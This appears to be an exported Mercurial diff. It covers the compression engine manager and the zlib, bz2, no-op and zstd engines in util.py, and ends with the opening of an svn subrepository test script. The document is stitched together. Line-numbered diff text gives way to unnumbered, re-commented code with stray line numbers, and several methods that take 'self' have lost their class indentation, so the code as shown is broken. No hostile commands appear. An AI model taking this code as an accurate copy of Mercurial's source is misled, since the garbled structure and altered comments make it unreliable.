3114 self._bundlenames = {}
3114 # Internal bundle identifier to engine name.
3115 # Internal bundle identifier to engine name.
3115 self._bundletypes = {}
3116 self._bundletypes = {}
3116 # Revlog header to engine name.
3117 # Revlog header to engine name.
3117 self._revlogheaders = {}
3118 self._revlogheaders = {}
3118 # Wire proto identifier to engine name.
3119 # Wire proto identifier to engine name.
3119 self._wiretypes = {}
3120 self._wiretypes = {}
3120
3121
3121 def __getitem__(self, key):
3122 def __getitem__(self, key):
3122 return self._engines[key]
3123 return self._engines[key]
3123
3124
3124 def __contains__(self, key):
3125 def __contains__(self, key):
3125 return key in self._engines
3126 return key in self._engines
3126
3127
3127 def __iter__(self):
3128 def __iter__(self):
3128 return iter(self._engines.keys())
3129 return iter(self._engines.keys())
3129
3130
3130 def register(self, engine):
3131 def register(self, engine):
3131 """Register a compression engine with the manager.
3132 """Register a compression engine with the manager.
3132
3133
3133 The argument must be a ``compressionengine`` instance.
3134 The argument must be a ``compressionengine`` instance.
3134 """
3135 """
3135 if not isinstance(engine, compressionengine):
3136 if not isinstance(engine, compressionengine):
3136 raise ValueError(_('argument must be a compressionengine'))
3137 raise ValueError(_('argument must be a compressionengine'))
3137
3138
3138 name = engine.name()
3139 name = engine.name()
3139
3140
3140 if name in self._engines:
3141 if name in self._engines:
3141 raise error.Abort(_('compression engine %s already registered') %
3142 raise error.Abort(_('compression engine %s already registered') %
3142 name)
3143 name)
3143
3144
3144 bundleinfo = engine.bundletype()
3145 bundleinfo = engine.bundletype()
3145 if bundleinfo:
3146 if bundleinfo:
3146 bundlename, bundletype = bundleinfo
3147 bundlename, bundletype = bundleinfo
3147
3148
3148 if bundlename in self._bundlenames:
3149 if bundlename in self._bundlenames:
3149 raise error.Abort(_('bundle name %s already registered') %
3150 raise error.Abort(_('bundle name %s already registered') %
3150 bundlename)
3151 bundlename)
3151 if bundletype in self._bundletypes:
3152 if bundletype in self._bundletypes:
3152 raise error.Abort(_('bundle type %s already registered by %s') %
3153 raise error.Abort(_('bundle type %s already registered by %s') %
3153 (bundletype, self._bundletypes[bundletype]))
3154 (bundletype, self._bundletypes[bundletype]))
3154
3155
3155 # No external facing name declared.
3156 # No external facing name declared.
3156 if bundlename:
3157 if bundlename:
3157 self._bundlenames[bundlename] = name
3158 self._bundlenames[bundlename] = name
3158
3159
3159 self._bundletypes[bundletype] = name
3160 self._bundletypes[bundletype] = name
3160
3161
3161 wiresupport = engine.wireprotosupport()
3162 wiresupport = engine.wireprotosupport()
3162 if wiresupport:
3163 if wiresupport:
3163 wiretype = wiresupport.name
3164 wiretype = wiresupport.name
3164 if wiretype in self._wiretypes:
3165 if wiretype in self._wiretypes:
3165 raise error.Abort(_('wire protocol compression %s already '
3166 raise error.Abort(_('wire protocol compression %s already '
3166 'registered by %s') %
3167 'registered by %s') %
3167 (wiretype, self._wiretypes[wiretype]))
3168 (wiretype, self._wiretypes[wiretype]))
3168
3169
3169 self._wiretypes[wiretype] = name
3170 self._wiretypes[wiretype] = name
3170
3171
3171 revlogheader = engine.revlogheader()
3172 revlogheader = engine.revlogheader()
3172 if revlogheader and revlogheader in self._revlogheaders:
3173 if revlogheader and revlogheader in self._revlogheaders:
3173 raise error.Abort(_('revlog header %s already registered by %s') %
3174 raise error.Abort(_('revlog header %s already registered by %s') %
3174 (revlogheader, self._revlogheaders[revlogheader]))
3175 (revlogheader, self._revlogheaders[revlogheader]))
3175
3176
3176 if revlogheader:
3177 if revlogheader:
3177 self._revlogheaders[revlogheader] = name
3178 self._revlogheaders[revlogheader] = name
3178
3179
3179 self._engines[name] = engine
3180 self._engines[name] = engine
3180
3181
@property
def supportedbundlenames(self):
    """Set of every user-facing bundle compression name registered."""
    # Iterating a dict yields its keys, so no explicit .keys() call needed.
    return set(self._bundlenames)
3184
3185
@property
def supportedbundletypes(self):
    """Set of every internal bundle type identifier registered."""
    return {bundletype for bundletype in self._bundletypes}
3188
3189
def forbundlename(self, bundlename):
    """Obtain a compression engine registered to a bundle name.

    Will raise KeyError if the bundle type isn't registered.

    Will abort if the engine is known but not available.
    """
    enginename = self._bundlenames[bundlename]
    candidate = self._engines[enginename]
    if candidate.available():
        return candidate
    # Known but unloadable (e.g. missing optional C extension).
    raise error.Abort(_('compression engine %s could not be loaded') %
                      candidate.name())
3201
3202
def forbundletype(self, bundletype):
    """Obtain a compression engine registered to a bundle type.

    Will raise KeyError if the bundle type isn't registered.

    Will abort if the engine is known but not available.
    """
    enginename = self._bundletypes[bundletype]
    candidate = self._engines[enginename]
    if candidate.available():
        return candidate
    # Known but unloadable (e.g. missing optional C extension).
    raise error.Abort(_('compression engine %s could not be loaded') %
                      candidate.name())
3214
3215
def supportedwireengines(self, role, onlyavailable=True):
    """Obtain compression engines that support the wire protocol.

    Returns a list of engines in prioritized order, most desired first.

    If ``onlyavailable`` is set, filter out engines that can't be
    loaded.
    """
    assert role in (SERVERROLE, CLIENTROLE)

    if role == SERVERROLE:
        attr = 'serverpriority'
    else:
        attr = 'clientpriority'

    candidates = []
    for enginename in self._wiretypes.values():
        engine = self._engines[enginename]
        if onlyavailable and not engine.available():
            continue
        candidates.append(engine)

    def sortkey(engine):
        # Highest priority first; ties broken alphabetically by wire
        # protocol name. This is arbitrary, but ensures output is stable.
        support = engine.wireprotosupport()
        return (-getattr(support, attr), support.name)

    return sorted(candidates, key=sortkey)
3239
3240
def forwiretype(self, wiretype):
    """Obtain the loaded engine registered for wire type ``wiretype``.

    Raises KeyError for unknown types and aborts when the engine is
    registered but cannot be loaded.
    """
    engine = self._engines[self._wiretypes[wiretype]]
    if engine.available():
        return engine
    raise error.Abort(_('compression engine %s could not be loaded') %
                      engine.name())
3246
3247
def forrevlogheader(self, header):
    """Obtain a compression engine registered to a revlog header.

    Will raise KeyError if the revlog header value isn't registered.
    """
    enginename = self._revlogheaders[header]
    return self._engines[enginename]
3253
3254
# Module-level singleton registry; the engine classes defined below
# register themselves with this instance at import time.
compengines = compressormanager()
3255
3256
class compressionengine(object):
    """Abstract interface that all compression engines must implement.

    The defaults describe an engine that participates in nothing;
    concrete engines override whichever methods apply to them.
    """
    def name(self):
        """Return the key under which this engine is registered.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Report whether this engine can be used in this installation.

        Optional engines (such as those relying on C extensions that may
        be missing) override this; the default says the engine is usable.
        """
        return True

    def bundletype(self):
        """Describe bundle identifiers for this engine.

        Returns None when this engine isn't supported for bundles.
        Otherwise returns a 2-tuple of strings: the user-facing "bundle
        spec" compression name and the internal identifier denoting the
        compression format within bundles. Set the first element to
        ``None`` to exclude the name from external usage.

        Engines that support bundle compression must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is surfaced in the help system to
        tell users about the engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        Returns None when this engine can't compress wire protocol
        payloads. Otherwise returns a ``compenginewireprotosupport``
        carrying a string format identifier plus integer priorities for
        the server and the client. Higher priorities are advertised
        first; non-positive priorities aren't advertised at all. The
        values only set a default ordering — configuration can change
        the relative order.

        Engines that support wire protocol compression must also
        implement ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        Returns the bytes used to identify chunks compressed with this
        engine, or ``None`` when the engine does not participate in
        revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        Receives an iterator (ideally a generator) of chunks of bytes to
        be compressed and returns an iterator (ideally a generator) of
        compressed byte chunks. The optional ``opts`` argument tunes
        compression and is treated differently by each engine.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        ``fh`` is an object with a ``read(size)`` method returning
        compressed data; the return value is an object with a
        ``read(size)`` returning uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The returned object has a ``compress(data)`` method returning
        compressed binary data — prefixed with a header matching
        ``revlogheader()`` so decompression can be routed back here — or
        ``None`` when the data could not be compressed (too small, not
        compressible, etc). Its ``decompress(data)`` method is only
        called when ``data`` begins with ``revlogheader()`` and returns
        the raw, uncompressed data or raises a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3372
3373
class _zlibengine(compressionengine):
    """Compression engine backed by the stdlib ``zlib`` module."""
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        # Equal server/client priority of 20: advertised, but below zstd.
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        # 'x' is the first byte of a standard zlib stream, which is how
        # zlib-compressed revlog chunks have historically been detected.
        return 'x'

    def compressstream(self, it, opts=None):
        # opts may carry 'level'; -1 selects zlib's default level.
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                # A single input chunk can expand to more than the output
                # cap, so keep draining via unconsumed_tail until done.
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Below 44 bytes zlib's overhead makes compression a net loss,
            # so don't even try.
            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                # Only use the compressed form if it actually saved space.
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    # Feed the data in 1 MiB slices.
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                # Normalize zlib failures into the revlog error type
                # callers expect.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        # Stateless wrapper; opts are currently ignored for zlib.
        return self.zlibrevlogcompressor()
3457
3458
# Make the zlib engine available through the global registry.
compengines.register(_zlibengine())
3459
3460
class _bz2engine(compressionengine):
    """Compression engine backed by the stdlib ``bz2`` module."""

    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # A wire protocol name is declared, but both priorities are 0 so the
    # format is never advertised by default: it is simply too slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        compressor = bz2.BZ2Compressor(opts.get('level', 9))
        for piece in it:
            emitted = compressor.compress(piece)
            # compress() buffers internally and may emit nothing yet.
            if emitted:
                yield emitted

        yield compressor.flush()

    def decompressorreader(self, fh):
        def _chunks():
            decompressor = bz2.BZ2Decompressor()
            for piece in filechunkiter(fh):
                yield decompressor.decompress(piece)

        return chunkbuffer(_chunks())
3500
3501
# Make the bz2 engine available through the global registry.
compengines.register(_bz2engine())
3502
3503
class _truncatedbz2engine(compressionengine):
    # Handles bz2 streams whose leading 'BZ' magic has been stripped.
    # bundletype() returns None for the external name, so this engine is
    # internal-only — presumably for a legacy bundle format; confirm
    # against the bundle-reading code.
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())
3521
3522
# Make the headerless-bz2 engine available through the global registry.
compengines.register(_truncatedbz2engine())
3523
3524
class _noopengine(compressionengine):
    """Pass-through engine: data flows through entirely uncompressed."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Client priority is 10 (always supported — uncompressed payloads cost
    # nothing to decode), but server priority is 0 so it is never
    # advertised: without a fast network, uncompressed payloads can easily
    # saturate the pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # revlogheader is deliberately not implemented here; the revlog class
    # treats the uncompressed case specially.

    def compressstream(self, it, opts=None):
        # Identity transform: hand the chunks back untouched.
        return it

    def decompressorreader(self, fh):
        # Identity transform: the file object already yields plain data.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Never claims to compress, so revlog stores data as-is.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()
3556
3557
# Make the no-op engine available through the global registry.
compengines.register(_noopengine())
3558
3559
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled ``zstd`` module."""
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # Only usable when the optional zstd module imported successfully.
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        # Priority 50 on both sides: preferred over zlib (20) when present.
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # Single-byte marker prepended to zstd-compressed revlog chunks.
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            # compressobj buffers internally; skip empty intermediate output.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            # Chunk sizes recommended by the zstd bindings for streaming.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            # Tiny inputs can't win against the frame overhead.
            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                # Only use the compressed form if it actually saved space.
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream large inputs in recommended-size slices to bound
                # memory usage.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                # Normalize any zstd failure into the revlog error type
                # callers expect.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))
3685
3686
# Make the zstd engine available through the global registry.
compengines.register(_zstdengine())
3687
3688
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    topics = {}

    # Formatting happens on a throwaway holder object so the engine's own
    # docstring is never mutated.
    class docobject(object):
        pass

    for enginename in compengines:
        engine = compengines[enginename]
        if not engine.available():
            continue

        bundleinfo = engine.bundletype()
        # Skip engines with no bundle support or no external-facing name.
        if not bundleinfo or not bundleinfo[0]:
            continue

        holder = docobject()
        holder.__doc__ = pycompat.sysstr('``%s``\n    %s') % (
            bundleinfo[0], engine.bundletype.__doc__)
        topics[bundleinfo[0]] = holder

    return topics
3717
3718
# convenient shortcut (short alias for debugstacktrace, handy for
# temporary debugging calls)
dst = debugstacktrace
@@ -1,641 +1,705 b''
1 #require svn15
1 #require svn15
2
2
3 $ SVNREPOPATH=`pwd`/svn-repo
3 $ SVNREPOPATH=`pwd`/svn-repo
4 #if windows
4 #if windows
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
6 #else
6 #else
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
8 #endif
8 #endif
9
9
10 $ filter_svn_output () {
10 $ filter_svn_output () {
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
12 > }
12 > }
13
13
14 create subversion repo
14 create subversion repo
15
15
16 $ WCROOT="`pwd`/svn-wc"
16 $ WCROOT="`pwd`/svn-wc"
17 $ svnadmin create svn-repo
17 $ svnadmin create svn-repo
18 $ svn co "$SVNREPOURL" svn-wc
18 $ svn co "$SVNREPOURL" svn-wc
19 Checked out revision 0.
19 Checked out revision 0.
20 $ cd svn-wc
20 $ cd svn-wc
21 $ mkdir src
21 $ mkdir src
22 $ echo alpha > src/alpha
22 $ echo alpha > src/alpha
23 $ svn add src
23 $ svn add src
24 A src
24 A src
25 A src/alpha (glob)
25 A src/alpha (glob)
26 $ mkdir externals
26 $ mkdir externals
27 $ echo other > externals/other
27 $ echo other > externals/other
28 $ svn add externals
28 $ svn add externals
29 A externals
29 A externals
30 A externals/other (glob)
30 A externals/other (glob)
31 $ svn ci -qm 'Add alpha'
31 $ svn ci -qm 'Add alpha'
32 $ svn up -q
32 $ svn up -q
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
34 $ svn propset -F extdef svn:externals src
34 $ svn propset -F extdef svn:externals src
35 property 'svn:externals' set on 'src'
35 property 'svn:externals' set on 'src'
36 $ svn ci -qm 'Setting externals'
36 $ svn ci -qm 'Setting externals'
37 $ cd ..
37 $ cd ..
38
38
39 create hg repo
39 create hg repo
40
40
41 $ mkdir sub
41 $ mkdir sub
42 $ cd sub
42 $ cd sub
43 $ hg init t
43 $ hg init t
44 $ cd t
44 $ cd t
45
45
46 first revision, no sub
46 first revision, no sub
47
47
48 $ echo a > a
48 $ echo a > a
49 $ hg ci -Am0
49 $ hg ci -Am0
50 adding a
50 adding a
51
51
52 add first svn sub with leading whitespaces
52 add first svn sub with leading whitespaces
53
53
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
56 $ svn co --quiet "$SVNREPOURL"/src s
56 $ svn co --quiet "$SVNREPOURL"/src s
57 $ mkdir subdir
57 $ mkdir subdir
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
59 $ hg add .hgsub
59 $ hg add .hgsub
60 $ hg ci -m1
60 $ hg ci -m1
61
61
62 make sure we avoid empty commits (issue2445)
62 make sure we avoid empty commits (issue2445)
63
63
64 $ hg sum
64 $ hg sum
65 parent: 1:* tip (glob)
65 parent: 1:* tip (glob)
66 1
66 1
67 branch: default
67 branch: default
68 commit: (clean)
68 commit: (clean)
69 update: (current)
69 update: (current)
70 phases: 2 draft
70 phases: 2 draft
71 $ hg ci -moops
71 $ hg ci -moops
72 nothing changed
72 nothing changed
73 [1]
73 [1]
74
74
75 debugsub
75 debugsub
76
76
77 $ hg debugsub
77 $ hg debugsub
78 path s
78 path s
79 source file://*/svn-repo/src (glob)
79 source file://*/svn-repo/src (glob)
80 revision 2
80 revision 2
81 path subdir/s
81 path subdir/s
82 source file://*/svn-repo/src (glob)
82 source file://*/svn-repo/src (glob)
83 revision 2
83 revision 2
84
84
85 change file in svn and hg, commit
85 change file in svn and hg, commit
86
86
87 $ echo a >> a
87 $ echo a >> a
88 $ echo alpha >> s/alpha
88 $ echo alpha >> s/alpha
89 $ hg sum
89 $ hg sum
90 parent: 1:* tip (glob)
90 parent: 1:* tip (glob)
91 1
91 1
92 branch: default
92 branch: default
93 commit: 1 modified, 1 subrepos
93 commit: 1 modified, 1 subrepos
94 update: (current)
94 update: (current)
95 phases: 2 draft
95 phases: 2 draft
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
97 committing subrepository s
97 committing subrepository s
98 Sending*s/alpha (glob)
98 Sending*s/alpha (glob)
99 Committed revision 3.
99 Committed revision 3.
100 Fetching external item into '*s/externals'* (glob)
100 Fetching external item into '*s/externals'* (glob)
101 External at revision 1.
101 External at revision 1.
102 At revision 3.
102 At revision 3.
103 $ hg debugsub
103 $ hg debugsub
104 path s
104 path s
105 source file://*/svn-repo/src (glob)
105 source file://*/svn-repo/src (glob)
106 revision 3
106 revision 3
107 path subdir/s
107 path subdir/s
108 source file://*/svn-repo/src (glob)
108 source file://*/svn-repo/src (glob)
109 revision 2
109 revision 2
110
110
111 missing svn file, commit should fail
111 missing svn file, commit should fail
112
112
113 $ rm s/alpha
113 $ rm s/alpha
114 $ hg commit --subrepos -m 'abort on missing file'
114 $ hg commit --subrepos -m 'abort on missing file'
115 committing subrepository s
115 committing subrepository s
116 abort: cannot commit missing svn entries (in subrepository "s")
116 abort: cannot commit missing svn entries (in subrepository "s")
117 [255]
117 [255]
118 $ svn revert s/alpha > /dev/null
118 $ svn revert s/alpha > /dev/null
119
119
120 add an unrelated revision in svn and update the subrepo to without
120 add an unrelated revision in svn and update the subrepo to without
121 bringing any changes.
121 bringing any changes.
122
122
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
124 $ svn up -q s
124 $ svn up -q s
125 $ hg sum
125 $ hg sum
126 parent: 2:* tip (glob)
126 parent: 2:* tip (glob)
127 Message!
127 Message!
128 branch: default
128 branch: default
129 commit: (clean)
129 commit: (clean)
130 update: (current)
130 update: (current)
131 phases: 3 draft
131 phases: 3 draft
132
132
133 $ echo a > s/a
133 $ echo a > s/a
134
134
135 should be empty despite change to s/a
135 should be empty despite change to s/a
136
136
137 $ hg st
137 $ hg st
138
138
139 add a commit from svn
139 add a commit from svn
140
140
141 $ cd "$WCROOT/src"
141 $ cd "$WCROOT/src"
142 $ svn up -q
142 $ svn up -q
143 $ echo xyz >> alpha
143 $ echo xyz >> alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
145 property 'svn:mime-type' set on 'alpha'
145 property 'svn:mime-type' set on 'alpha'
146 $ svn ci -qm 'amend a from svn'
146 $ svn ci -qm 'amend a from svn'
147 $ cd ../../sub/t
147 $ cd ../../sub/t
148
148
149 this commit from hg will fail
149 this commit from hg will fail
150
150
151 $ echo zzz >> s/alpha
151 $ echo zzz >> s/alpha
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
153 committing subrepository s
153 committing subrepository s
154 abort: svn:*Commit failed (details follow): (glob)
154 abort: svn:*Commit failed (details follow): (glob)
155 [255]
155 [255]
156 $ svn revert -q s/alpha
156 $ svn revert -q s/alpha
157
157
158 this commit fails because of meta changes
158 this commit fails because of meta changes
159
159
160 $ svn propset svn:mime-type 'text/html' s/alpha
160 $ svn propset svn:mime-type 'text/html' s/alpha
161 property 'svn:mime-type' set on 's/alpha' (glob)
161 property 'svn:mime-type' set on 's/alpha' (glob)
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
163 committing subrepository s
163 committing subrepository s
164 abort: svn:*Commit failed (details follow): (glob)
164 abort: svn:*Commit failed (details follow): (glob)
165 [255]
165 [255]
166 $ svn revert -q s/alpha
166 $ svn revert -q s/alpha
167
167
168 this commit fails because of externals changes
168 this commit fails because of externals changes
169
169
170 $ echo zzz > s/externals/other
170 $ echo zzz > s/externals/other
171 $ hg ci --subrepos -m 'amend externals from hg'
171 $ hg ci --subrepos -m 'amend externals from hg'
172 committing subrepository s
172 committing subrepository s
173 abort: cannot commit svn externals (in subrepository "s")
173 abort: cannot commit svn externals (in subrepository "s")
174 [255]
174 [255]
175 $ hg diff --subrepos -r 1:2 | grep -v diff
175 $ hg diff --subrepos -r 1:2 | grep -v diff
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
178 @@ -1,2 +1,2 @@
178 @@ -1,2 +1,2 @@
179 -2 s
179 -2 s
180 +3 s
180 +3 s
181 2 subdir/s
181 2 subdir/s
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
184 @@ -1,1 +1,2 @@
184 @@ -1,1 +1,2 @@
185 a
185 a
186 +a
186 +a
187 $ svn revert -q s/externals/other
187 $ svn revert -q s/externals/other
188
188
189 this commit fails because of externals meta changes
189 this commit fails because of externals meta changes
190
190
191 $ svn propset svn:mime-type 'text/html' s/externals/other
191 $ svn propset svn:mime-type 'text/html' s/externals/other
192 property 'svn:mime-type' set on 's/externals/other' (glob)
192 property 'svn:mime-type' set on 's/externals/other' (glob)
193 $ hg ci --subrepos -m 'amend externals from hg'
193 $ hg ci --subrepos -m 'amend externals from hg'
194 committing subrepository s
194 committing subrepository s
195 abort: cannot commit svn externals (in subrepository "s")
195 abort: cannot commit svn externals (in subrepository "s")
196 [255]
196 [255]
197 $ svn revert -q s/externals/other
197 $ svn revert -q s/externals/other
198
198
199 clone
199 clone
200
200
201 $ cd ..
201 $ cd ..
202 $ hg clone t tc
202 $ hg clone t tc
203 updating to branch default
203 updating to branch default
204 A tc/s/alpha (glob)
204 A tc/s/alpha (glob)
205 U tc/s (glob)
205 U tc/s (glob)
206
206
207 Fetching external item into 'tc/s/externals'* (glob)
207 Fetching external item into 'tc/s/externals'* (glob)
208 A tc/s/externals/other (glob)
208 A tc/s/externals/other (glob)
209 Checked out external at revision 1.
209 Checked out external at revision 1.
210
210
211 Checked out revision 3.
211 Checked out revision 3.
212 A tc/subdir/s/alpha (glob)
212 A tc/subdir/s/alpha (glob)
213 U tc/subdir/s (glob)
213 U tc/subdir/s (glob)
214
214
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
216 A tc/subdir/s/externals/other (glob)
216 A tc/subdir/s/externals/other (glob)
217 Checked out external at revision 1.
217 Checked out external at revision 1.
218
218
219 Checked out revision 2.
219 Checked out revision 2.
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
221 $ cd tc
221 $ cd tc
222
222
223 debugsub in clone
223 debugsub in clone
224
224
225 $ hg debugsub
225 $ hg debugsub
226 path s
226 path s
227 source file://*/svn-repo/src (glob)
227 source file://*/svn-repo/src (glob)
228 revision 3
228 revision 3
229 path subdir/s
229 path subdir/s
230 source file://*/svn-repo/src (glob)
230 source file://*/svn-repo/src (glob)
231 revision 2
231 revision 2
232
232
233 verify subrepo is contained within the repo directory
233 verify subrepo is contained within the repo directory
234
234
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
236 True
236 True
237
237
